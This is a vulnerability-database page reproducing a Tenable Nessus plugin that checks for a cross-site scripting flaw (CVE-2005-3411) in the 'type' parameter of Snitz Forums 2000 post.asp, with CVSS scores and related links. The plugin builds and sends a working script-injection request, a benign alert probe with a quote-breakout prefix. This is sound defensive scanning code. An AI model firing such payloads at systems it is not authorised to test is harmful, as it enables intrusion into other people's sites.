Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2006-2022 Tenable Network Security, Inc.SNITZ_FORUMS_2000_TYPE_XSS.NASL
HistoryFeb 01, 2006 - 12:00 a.m.

Snitz Forums 2000 post.asp type Parameter XSS

2006-02-0100:00:00
This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.
www.tenable.com
13

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS

0.005

Percentile

75.2%

JSON

The remote host is running Snitz Forums 2000, a web-based electronic forum written in ASP.

The version of Snitz Forums 2000 installed on the remote host fails to sanitize the ‘type’ parameter before using it in the ‘post.asp’ script to generate dynamic content. By leveraging this flaw, an attacker may be able to execute arbitrary HTML and script code in a user’s browser within the security context of the affected application.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(20833);
  script_version("1.20");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2005-3411");
  script_bugtraq_id(15241);

  script_name(english:"Snitz Forums 2000 post.asp type Parameter XSS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains an ASP script that is prone to a cross-
site scripting attack.");
  script_set_attribute(attribute:"description", value:
"The remote host is running Snitz Forums 2000, a web-based electronic
forum written in ASP. 

The version of Snitz Forums 2000 installed on the remote host fails to
sanitize the 'type' parameter before using it in the 'post.asp' script
to generate dynamic content.  By leveraging this flaw, an attacker may
be able to execute arbitrary HTML and script code in a user's browser
within the security context of the affected application.");
  script_set_attribute(attribute:"see_also", value:"http://forum.snitz.com/forum/topic.asp?TOPIC_ID=60011");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Snitz Forums 2000 version 3.4.06 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/10/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/02/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_keys("www/ASP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");

port = get_http_port(default:80, embedded: 0, asp: 1, no_xss: 1);

# A simple alert.
xss = "<script>alert('" + SCRIPT_NAME + "')</script>";
# nb: the url-encoded version is what we need to pass in.
exss = urlencode(str:xss);


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/forum", "/snitz", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Get the initial page for a list of forums.
  res = http_get_cache(item:string(dir, "/default.asp"), port:port, exit_on_fail: 1);

  # If it looks like Snitz Forums 2000...
  if (
    'title>Snitz Forums' >< res ||
    'Snitz Communications<' >< res ||
    'title="Powered By: Snitz Forums' >< res
  )
  {
    # Exploiting the flaw requires an existent forum.
    forum = NULL;

    pat = '<a href="forum.asp?FORUM_ID=([0-9]+)">';
    matches = egrep(pattern:pat, string:res);
    if (matches)
    {
      foreach match (split(matches, keep:FALSE)) {
        item = eregmatch(pattern:pat, string:match);
        if (!isnull(item)) {
          forum = item[1];
          break;
        }
      }
    }

    # Try to exploit the flaw.
    if (isnull(forum)) {
      debug_print("couldn't find a forum to use!", level:1);
    }
    else {
      w = http_send_recv3(method:"GET", 
        item:string(
          dir, "/post.asp?",
          "method=Topic&",
          "FORUM_ID=", forum, "&",
          'type=">', exss
        ), 
	exit_on_fail: 1,
        port:port
      );
      res = w[2];

      # If we see our XSS, there's a problem.
      if (xss >< res) {
        security_warning(port);
        set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
        exit(0);
      }
    }
  }
}

Related

nvd 1
cvelist 1
cve 1
exploitdb 1
nvd
nvd
CVE-2005-3411
2005-11-01 20:03:00
cvelist
cvelist
CVE-2005-3411
2005-11-01 20:00:00
cve
cve
CVE-2005-3411
2005-11-01 20:03:00
exploitdb
exploitdb
Snitz Forum 2000 - &#039;post.asp&#039; Cross-Site Scripting
2005-10-31 00:00:00

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS

0.005

Percentile

75.2%

JSON
Related for SNITZ_FORUMS_2000_TYPE_XSS.NASL
nvd1cvelist1cve1exploitdb1